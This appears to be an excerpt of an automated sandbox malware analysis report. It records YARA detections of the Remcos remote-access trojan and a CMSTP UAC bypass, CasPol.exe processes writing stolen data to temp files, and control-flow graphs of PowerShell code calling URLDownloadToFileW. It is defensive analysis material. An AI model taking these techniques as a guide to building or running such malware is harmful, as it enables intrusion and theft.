                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4102227044.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Has exited:false

                                                                                              Target ID:13
                                                                                              Start time:00:13:22
                                                                                              Start date:14/01/2025
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\aockdegvxmbvbenvzdaftknehua"
                                                                                              Imagebase:0xad0000
                                                                                              File size:108'664 bytes
                                                                                              MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:14
                                                                                              Start time:00:13:22
                                                                                              Start date:14/01/2025
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\kihdewrolutadkbziovgwxanibscod"
                                                                                              Imagebase:0xc10000
                                                                                              File size:108'664 bytes
                                                                                              MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:15
                                                                                              Start time:00:13:22
                                                                                              Start date:14/01/2025
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\nkmnepbqzclnnyxdazhahcueqhcdhonmrf"
                                                                                              Imagebase:0x430000
                                                                                              File size:108'664 bytes
                                                                                              MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Reset < >
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000003.1670731895.0000000006B10000.00000010.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_3_6b10000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 037dc4ef6326651d38b85673fad8e8241394d4c7a3fc419d5f26538f80e53bc6
                                                                                                • Instruction ID: 0b3b8021ca60d3b4b9596f15929dea75475d8e1513e2fe8e814c459bf760e0a5
                                                                                                • Opcode Fuzzy Hash: 037dc4ef6326651d38b85673fad8e8241394d4c7a3fc419d5f26538f80e53bc6
                                                                                                • Instruction Fuzzy Hash: 6411D3B4A00304AFE750DE988892BBEF3F5EFC9310F95045DE541AB341DBB88C818BA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000003.1670731895.0000000006B10000.00000010.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_3_6b10000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bc795644ce4693c420319fbd1a42211006d636954842800266bca1aa31d275c3
                                                                                                • Instruction ID: 7687b79055c6cbd2947d1980c5557d2aaa1bd510c171500252ab6157f06fbf12
                                                                                                • Opcode Fuzzy Hash: bc795644ce4693c420319fbd1a42211006d636954842800266bca1aa31d275c3
                                                                                                • Instruction Fuzzy Hash: 4F11D3B4A00304AFE750DF988892ABEF3F5EFD9310F95045DE545AB341DAB88C8187A1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000003.1670683670.0000000006B11000.00000010.00000800.00020000.00000000.sdmp, Offset: 06B11000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_3_6b11000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ed308c95aa95c1b78e5589d5f9f853eb27cf9ca6f4761ec1818b2dc44d38fefd
                                                                                                • Instruction ID: aea02ae266d1324dbff46921f6fd3f73858f328d58347481efa37cb78cdec584
                                                                                                • Opcode Fuzzy Hash: ed308c95aa95c1b78e5589d5f9f853eb27cf9ca6f4761ec1818b2dc44d38fefd
                                                                                                • Instruction Fuzzy Hash: 4311B1B4A00304ABE790CF9C88527BDF7E9EFCA650F54044DE645AB241D6B48C018BA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000003.1670731895.0000000006B10000.00000010.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_3_6b10000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f50357f9421138c8dfe1ec9ab92f750236110c3412e993d39560b7e41613493d
                                                                                                • Instruction ID: 3f54673011dcb0cf18b4053ff9e9333dd308cba909796be0213ac2067f3f995f
                                                                                                • Opcode Fuzzy Hash: f50357f9421138c8dfe1ec9ab92f750236110c3412e993d39560b7e41613493d
                                                                                                • Instruction Fuzzy Hash: 680171B0A043499BEB64CBA98992AFEF7F5EFD9310F44045DD605A7241DAB49C808A61
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000003.1670683670.0000000006B11000.00000010.00000800.00020000.00000000.sdmp, Offset: 06B11000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_3_6b11000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2870f3b162999cfc1c36d82544da4b5c7ec8284f6d198e94b1f3d51041ec4284
                                                                                                • Instruction ID: 46f08fc605a05420da0798ee3368de298494c19e6279fa6285fba71ecedc40ba
                                                                                                • Opcode Fuzzy Hash: 2870f3b162999cfc1c36d82544da4b5c7ec8284f6d198e94b1f3d51041ec4284
                                                                                                • Instruction Fuzzy Hash: B701DFB4E00349ABEB50CBA98892AFEF7FAEFC9600F04044ED705A7341D6B49C408B60
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000003.1670751634.0000000006A30000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_3_6a30000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                • Instruction ID: e9ce2c259fe209befc9481ad64a5d1820c24fe575278aecac20a63159950bfc9
                                                                                                • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000003.1670751634.0000000006A30000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_3_6a30000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                • Instruction ID: e9ce2c259fe209befc9481ad64a5d1820c24fe575278aecac20a63159950bfc9
                                                                                                • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                • Instruction Fuzzy Hash:

                                                                                                Execution Graph

                                                                                                Execution Coverage:3.9%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:9.8%
                                                                                                Total number of Nodes:51
                                                                                                Total number of Limit Nodes:6
                                                                                                execution_graph 9292 907570 9293 907573 9292->9293 9295 90764b 9293->9295 9298 907c68 9293->9298 9303 907da8 9293->9303 9299 907c6d 9298->9299 9308 6e74610 9299->9308 9317 6e745af 9299->9317 9326 6e7460f 9299->9326 9304 907cf9 9303->9304 9304->9303 9305 6e74610 5 API calls 9304->9305 9306 6e7460f 5 API calls 9304->9306 9307 6e745af 5 API calls 9304->9307 9305->9304 9306->9304 9307->9304 9310 6e7461b 9308->9310 9309 6e74a93 9309->9299 9310->9309 9335 907e00 9310->9335 9339 907dff 9310->9339 9343 907a09 9310->9343 9348 907a18 9310->9348 9353 907c45 9310->9353 9311 6e74a34 9311->9299 9319 6e745c2 9317->9319 9318 6e74a93 9318->9299 9319->9299 9319->9318 9321 907e00 URLDownloadToFileW 9319->9321 9322 907c45 URLDownloadToFileW 9319->9322 9323 907a18 URLDownloadToFileW 9319->9323 9324 907a09 URLDownloadToFileW 9319->9324 9325 907dff URLDownloadToFileW 9319->9325 9320 6e74a34 9320->9299 9321->9320 9322->9320 9323->9320 9324->9320 9325->9320 9328 6e74610 9326->9328 9327 6e74a93 9327->9299 9328->9327 9330 907e00 URLDownloadToFileW 9328->9330 9331 907c45 URLDownloadToFileW 9328->9331 9332 907a18 URLDownloadToFileW 9328->9332 9333 907a09 URLDownloadToFileW 9328->9333 9334 907dff URLDownloadToFileW 9328->9334 9329 6e74a34 9329->9299 9330->9329 9331->9329 9332->9329 9333->9329 9334->9329 9337 907e03 URLDownloadToFileW 9335->9337 9338 907ea8 9337->9338 9338->9311 9340 907e00 URLDownloadToFileW 9339->9340 9342 907ea8 9340->9342 9342->9311 9345 907a4c 9343->9345 9344 907b30 9344->9311 9345->9344 9346 907e71 URLDownloadToFileW 9345->9346 9347 907ea8 9346->9347 9347->9311 9350 907a4c 9348->9350 9349 907b30 9349->9311 9350->9349 9351 907e71 URLDownloadToFileW 9350->9351 9352 907ea8 9351->9352 9352->9311 9354 907b9a URLDownloadToFileW 9353->9354 9356 907ea8 9354->9356 9356->9311

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 109 907a18-907a4a 110 907a90 109->110 111 907a4c-907a53 109->111 112 907a93-907acf 110->112 113 907a64 111->113 114 907a55-907a62 111->114 123 907ad5-907ade 112->123 124 907b58-907b63 112->124 115 907a66-907a68 113->115 114->115 118 907a6a-907a6d 115->118 119 907a6f-907a71 115->119 120 907a8e 118->120 121 907a82 119->121 122 907a73-907a80 119->122 120->112 125 907a84-907a86 121->125 122->125 123->124 128 907ae0-907ae6 123->128 126 907b72-907b94 124->126 127 907b65-907b68 124->127 125->120 135 907b9a-907ba3 126->135 136 907c5e-907c63 126->136 127->126 130 907de8-907e52 128->130 131 907aec-907af9 128->131 146 907e54-907e5a 130->146 147 907e5d-907e63 130->147 133 907afb-907b2e 131->133 134 907b4f-907b56 131->134 144 907b30-907b33 133->144 145 907b4b 133->145 134->124 134->128 135->130 138 907ba9-907be7 135->138 136->130 153 907c01-907c14 138->153 154 907be9-907bff 138->154 149 907b35-907b38 144->149 150 907b3f-907b48 144->150 145->134 146->147 151 907e71-907ea6 URLDownloadToFileW 147->151 152 907e65-907e6e 147->152 149->150 155 907ea8-907eae 151->155 156 907eaf-907ec3 151->156 152->151 157 907c16-907c1d 153->157 154->157 155->156 158 907c42 157->158 159 907c1f-907c30 157->159 158->136 159->158 162 907c32-907c3b 159->162 162->158
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1774454298.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_900000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6915534ccb4c584ca3b17c9bb1144dad7c995ae33ef58798cdd36229dd4c0fe4
                                                                                                • Instruction ID: e1c8090d61bf7870d9ad2c23084a8aad7bb008f3aeb37f073e0db2fd0bc1db92
                                                                                                • Opcode Fuzzy Hash: 6915534ccb4c584ca3b17c9bb1144dad7c995ae33ef58798cdd36229dd4c0fe4
                                                                                                • Instruction Fuzzy Hash: D7B1E675E05219EFDB15CF98D584A9DFBB6FF48320F248559E804AB3A1C731AE81CB90

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 6e74610-6e7463b 2 6e74af2-6e74afa 0->2 3 6e74641-6e74646 0->3 4 6e7465e-6e74663 3->4 5 6e74648-6e7464e 3->5 8 6e74665-6e74671 4->8 9 6e74673 4->9 6 6e74652-6e7465c 5->6 7 6e74650 5->7 6->4 7->4 11 6e74675-6e74677 8->11 9->11 13 6e74a93-6e74a9d 11->13 14 6e7467d-6e74687 11->14 15 6e74a9f-6e74aa8 13->15 16 6e74aab-6e74ab1 13->16 14->2 17 6e7468d-6e74692 14->17 18 6e74ab7-6e74ac3 16->18 19 6e74ab3-6e74ab5 16->19 20 6e74694-6e7469a 17->20 21 6e746aa-6e746b8 17->21 22 6e74ac5-6e74aef 18->22 19->22 23 6e7469e-6e746a8 20->23 24 6e7469c 20->24 21->13 27 6e746be-6e746dd 21->27 23->21 24->21 27->13 33 6e746e3-6e746ed 27->33 33->2 34 6e746f3-6e746f8 33->34 35 6e74710-6e74714 34->35 36 6e746fa-6e74700 34->36 35->13 39 6e7471a-6e7471e 35->39 37 6e74704-6e7470e 36->37 38 6e74702 36->38 37->35 38->35 39->13 40 6e74724-6e74728 39->40 40->13 42 6e7472e-6e7473e 40->42 43 6e747c6-6e74815 42->43 44 6e74744-6e7476b 42->44 61 6e7481c-6e7482f 43->61 49 6e74785-6e747b3 44->49 50 6e7476d-6e74773 44->50 58 6e747b5-6e747b7 49->58 59 6e747c1-6e747c4 49->59 51 6e74777-6e74783 50->51 52 6e74775 50->52 51->49 52->49 58->59 59->61 62 6e748b7-6e74906 61->62 63 6e74835-6e7485c 61->63 80 6e7490d-6e74920 62->80 68 6e74876-6e748a4 63->68 69 6e7485e-6e74864 63->69 78 6e748a6-6e748a8 68->78 79 6e748b2-6e748b5 68->79 71 6e74866 69->71 72 6e74868-6e74874 69->72 71->68 72->68 78->79 79->80 81 6e74926-6e7494d 80->81 82 6e749a8-6e749f7 80->82 87 6e74967-6e74995 81->87 88 6e7494f-6e74955 81->88 99 6e749fe-6e74a2c 82->99 97 6e74997-6e74999 87->97 98 6e749a3-6e749a6 87->98 90 6e74957 88->90 91 6e74959-6e74965 88->91 90->87 91->87 97->98 98->99 104 6e74a2f call 907e00 99->104 105 6e74a2f call 907c45 99->105 106 6e74a2f call 907a18 99->106 107 6e74a2f call 907a09 99->107 108 6e74a2f call 907dff 99->108 102 6e74a34-6e74a90 104->102 105->102 106->102 107->102 108->102
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1778034513.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6e70000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tP^q$tP^q
                                                                                                • API String ID: 0-309238000
                                                                                                • Opcode ID: 16607f3ebde6f79dfa2253229156dd5b80c4fdfa599fe374fbf1a066dbfece76
                                                                                                • Instruction ID: befab713e48ed8188e4ca342541e28e1cdefad8fdf75943ba6dcd37075ed6ab9
                                                                                                • Opcode Fuzzy Hash: 16607f3ebde6f79dfa2253229156dd5b80c4fdfa599fe374fbf1a066dbfece76
                                                                                                • Instruction Fuzzy Hash: 61D1BE31F00308DFDB54DF68D804A6ABBE2BBC8710F248469E8059B394DA72DD45CBE1

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 163 907dff-907e52 167 907e54-907e5a 163->167 168 907e5d-907e63 163->168 167->168 169 907e71-907ea6 URLDownloadToFileW 168->169 170 907e65-907e6e 168->170 171 907ea8-907eae 169->171 172 907eaf-907ec3 169->172 170->169 171->172
                                                                                                APIs
                                                                                                • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 00907E99
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1774454298.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_900000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: DownloadFile
                                                                                                • String ID:
                                                                                                • API String ID: 1407266417-0
                                                                                                • Opcode ID: f456a2c0c5d4708e9822ca8c3413ebbd73d498ab7c8b228f1ee7ad9251df40e4
                                                                                                • Instruction ID: dd645ec6b6ffb3d5346e3700fae1c69b378a7b8bf13e94d79137da57b88f6608
                                                                                                • Opcode Fuzzy Hash: f456a2c0c5d4708e9822ca8c3413ebbd73d498ab7c8b228f1ee7ad9251df40e4
                                                                                                • Instruction Fuzzy Hash: 532126B5D01219EFCB00CF9AD884ADEFBF4FB48320F10816AE818A7250C374A954CFA0

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 174 907e00-907e52 177 907e54-907e5a 174->177 178 907e5d-907e63 174->178 177->178 179 907e71-907ea6 URLDownloadToFileW 178->179 180 907e65-907e6e 178->180 181 907ea8-907eae 179->181 182 907eaf-907ec3 179->182 180->179 181->182
                                                                                                APIs
                                                                                                • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 00907E99
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1774454298.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_900000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: DownloadFile
                                                                                                • String ID:
                                                                                                • API String ID: 1407266417-0
                                                                                                • Opcode ID: c83c491460c4b5a1e049d5c7d4cbbb6b8246253167b36b5923ed42ff75cff2d5
                                                                                                • Instruction ID: 739edd7b6cc1191ed7e664f390e93d25eb63ec99b1a2a0c1c7ceefc994eff068
                                                                                                • Opcode Fuzzy Hash: c83c491460c4b5a1e049d5c7d4cbbb6b8246253167b36b5923ed42ff75cff2d5
                                                                                                • Instruction Fuzzy Hash: 102126B1D01219EFCB00CF9AD884ADEFBF4FB48320F10816AE818A7250C374A954CFA0

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 184 6e745af-6e745c0 185 6e745c2-6e745c6 184->185 186 6e7461b-6e7463b 184->186 185->186 187 6e74af2-6e74afa 186->187 188 6e74641-6e74646 186->188 189 6e7465e-6e74663 188->189 190 6e74648-6e7464e 188->190 193 6e74665-6e74671 189->193 194 6e74673 189->194 191 6e74652-6e7465c 190->191 192 6e74650 190->192 191->189 192->189 196 6e74675-6e74677 193->196 194->196 198 6e74a93-6e74a9d 196->198 199 6e7467d-6e74687 196->199 200 6e74a9f-6e74aa8 198->200 201 6e74aab-6e74ab1 198->201 199->187 202 6e7468d-6e74692 199->202 203 6e74ab7-6e74ac3 201->203 204 6e74ab3-6e74ab5 201->204 205 6e74694-6e7469a 202->205 206 6e746aa-6e746b8 202->206 207 6e74ac5-6e74aef 203->207 204->207 208 6e7469e-6e746a8 205->208 209 6e7469c 205->209 206->198 212 6e746be-6e746dd 206->212 208->206 209->206 212->198 218 6e746e3-6e746ed 212->218 218->187 219 6e746f3-6e746f8 218->219 220 6e74710-6e74714 219->220 221 6e746fa-6e74700 219->221 220->198 224 6e7471a-6e7471e 220->224 222 6e74704-6e7470e 221->222 223 6e74702 221->223 222->220 223->220 224->198 225 6e74724-6e74728 224->225 225->198 227 6e7472e-6e7473e 225->227 228 6e747c6-6e74815 227->228 229 6e74744-6e7476b 227->229 246 6e7481c-6e7482f 228->246 234 6e74785-6e747b3 229->234 235 6e7476d-6e74773 229->235 243 6e747b5-6e747b7 234->243 244 6e747c1-6e747c4 234->244 236 6e74777-6e74783 235->236 237 6e74775 235->237 236->234 237->234 243->244 244->246 247 6e748b7-6e74906 246->247 248 6e74835-6e7485c 246->248 265 6e7490d-6e74920 247->265 253 6e74876-6e748a4 248->253 254 6e7485e-6e74864 248->254 263 6e748a6-6e748a8 253->263 264 6e748b2-6e748b5 253->264 256 6e74866 254->256 257 6e74868-6e74874 254->257 256->253 257->253 263->264 264->265 266 6e74926-6e7494d 265->266 267 6e749a8-6e749f7 265->267 272 6e74967-6e74995 266->272 273 6e7494f-6e74955 266->273 284 6e749fe-6e74a2c 267->284 282 6e74997-6e74999 272->282 283 6e749a3-6e749a6 272->283 275 6e74957 273->275 276 6e74959-6e74965 273->276 275->272 276->272 282->283 283->284 289 6e74a2f call 907e00 284->289 290 6e74a2f call 907c45 284->290 291 6e74a2f call 907a18 284->291 292 6e74a2f call 907a09 284->292 293 6e74a2f call 907dff 284->293 287 6e74a34-6e74a90 289->287 290->287 291->287 292->287 293->287
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1778034513.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6e70000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tP^q
                                                                                                • API String ID: 0-2862610199
                                                                                                • Opcode ID: 7798c975db98b5f83999bca421acf935d4cc705be1a9914af70ce5b4ee01cd49
                                                                                                • Instruction ID: 7b873ae3b05775436a5085456e468a288a1c9195f2beca2eb1ed1226fda97a23
                                                                                                • Opcode Fuzzy Hash: 7798c975db98b5f83999bca421acf935d4cc705be1a9914af70ce5b4ee01cd49
                                                                                                • Instruction Fuzzy Hash: 0D919A30E00309DFDB64CF58C540B69BBE2BB88714F2494A9E805AB391DB72ED85CB91

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 294 6e7460f-6e7463b 297 6e74af2-6e74afa 294->297 298 6e74641-6e74646 294->298 299 6e7465e-6e74663 298->299 300 6e74648-6e7464e 298->300 303 6e74665-6e74671 299->303 304 6e74673 299->304 301 6e74652-6e7465c 300->301 302 6e74650 300->302 301->299 302->299 306 6e74675-6e74677 303->306 304->306 308 6e74a93-6e74a9d 306->308 309 6e7467d-6e74687 306->309 310 6e74a9f-6e74aa8 308->310 311 6e74aab-6e74ab1 308->311 309->297 312 6e7468d-6e74692 309->312 313 6e74ab7-6e74ac3 311->313 314 6e74ab3-6e74ab5 311->314 315 6e74694-6e7469a 312->315 316 6e746aa-6e746b8 312->316 317 6e74ac5-6e74aef 313->317 314->317 318 6e7469e-6e746a8 315->318 319 6e7469c 315->319 316->308 322 6e746be-6e746dd 316->322 318->316 319->316 322->308 328 6e746e3-6e746ed 322->328 328->297 329 6e746f3-6e746f8 328->329 330 6e74710-6e74714 329->330 331 6e746fa-6e74700 329->331 330->308 334 6e7471a-6e7471e 330->334 332 6e74704-6e7470e 331->332 333 6e74702 331->333 332->330 333->330 334->308 335 6e74724-6e74728 334->335 335->308 337 6e7472e-6e7473e 335->337 338 6e747c6-6e74815 337->338 339 6e74744-6e7476b 337->339 356 6e7481c-6e7482f 338->356 344 6e74785-6e747b3 339->344 345 6e7476d-6e74773 339->345 353 6e747b5-6e747b7 344->353 354 6e747c1-6e747c4 344->354 346 6e74777-6e74783 345->346 347 6e74775 345->347 346->344 347->344 353->354 354->356 357 6e748b7-6e74906 356->357 358 6e74835-6e7485c 356->358 375 6e7490d-6e74920 357->375 363 6e74876-6e748a4 358->363 364 6e7485e-6e74864 358->364 373 6e748a6-6e748a8 363->373 374 6e748b2-6e748b5 363->374 366 6e74866 364->366 367 6e74868-6e74874 364->367 366->363 367->363 373->374 374->375 376 6e74926-6e7494d 375->376 377 6e749a8-6e749f7 375->377 382 6e74967-6e74995 376->382 383 6e7494f-6e74955 376->383 394 6e749fe-6e74a2c 377->394 392 6e74997-6e74999 382->392 393 6e749a3-6e749a6 382->393 385 6e74957 383->385 386 6e74959-6e74965 383->386 385->382 386->382 392->393 393->394 399 6e74a2f call 907e00 394->399 400 6e74a2f call 907c45 394->400 401 6e74a2f call 907a18 394->401 402 6e74a2f call 907a09 394->402 403 6e74a2f call 907dff 394->403 397 6e74a34-6e74a90 399->397 400->397 401->397 402->397 403->397
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1778034513.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6e70000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tP^q
                                                                                                • API String ID: 0-2862610199
                                                                                                • Opcode ID: 000d3abe6d11de5f040e71595cd5698b0ce02bf16a61f7e57cff690009e67f11
                                                                                                • Instruction ID: 354b1eb13cd0ed275f6c1ffa8410d7592514ed70a70c10fd64b893160ba4f36b
                                                                                                • Opcode Fuzzy Hash: 000d3abe6d11de5f040e71595cd5698b0ce02bf16a61f7e57cff690009e67f11
                                                                                                • Instruction Fuzzy Hash: 9C819C31E00309DFDB64CF58C541B6ABBE2BB88714F249469E805AB394DB71ED85CBD1

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 592 6e71f40-6e71f65 593 6e71f6b-6e71f70 592->593 594 6e72158-6e72162 592->594 595 6e71f72-6e71f78 593->595 596 6e71f88-6e71f8c 593->596 598 6e71f7c-6e71f86 595->598 599 6e71f7a 595->599 600 6e71f92-6e71f94 596->600 601 6e72108-6e72112 596->601 598->596 599->596 604 6e71f96-6e71fa2 600->604 605 6e71fa4 600->605 602 6e72114-6e7211d 601->602 603 6e72120-6e72126 601->603 606 6e7212c-6e72138 603->606 607 6e72128-6e7212a 603->607 609 6e71fa6-6e71fa8 604->609 605->609 610 6e7213a-6e72155 606->610 607->610 609->601 611 6e71fae-6e71fcd 609->611 617 6e71fcf-6e71fdb 611->617 618 6e71fdd 611->618 619 6e71fdf-6e71fe1 617->619 618->619 619->601 620 6e71fe7-6e71fee 619->620 620->594 621 6e71ff4-6e71ff9 620->621 622 6e72011-6e72020 621->622 623 6e71ffb-6e72001 621->623 622->601 628 6e72026-6e72044 622->628 624 6e72005-6e7200f 623->624 625 6e72003 623->625 624->622 625->622 628->601 631 6e7204a-6e7206f 628->631 631->601 634 6e72075-6e7207c 631->634 635 6e720c2-6e720f5 634->635 636 6e7207e-6e72099 634->636 646 6e720fc-6e72105 635->646 639 6e720b3-6e720b7 636->639 640 6e7209b-6e720a1 636->640 644 6e720be-6e720c0 639->644 642 6e720a5-6e720b1 640->642 643 6e720a3 640->643 642->639 643->639 644->646
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1778034513.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6e70000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e7fe407c3e85298abdd6697fc1cf09a2bd91a0e783230879596b8a9ff66044bf
                                                                                                • Instruction ID: ed4fd28bde5cd47ff39c001af9ae0de7f8ea3db3f14a6649a03fee584cc556ff
                                                                                                • Opcode Fuzzy Hash: e7fe407c3e85298abdd6697fc1cf09a2bd91a0e783230879596b8a9ff66044bf
                                                                                                • Instruction Fuzzy Hash: 9951F730F003148FDB64DB689C11AAEBBA2AFD4318F5490A5D6019F355DF32DA45CBE1

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
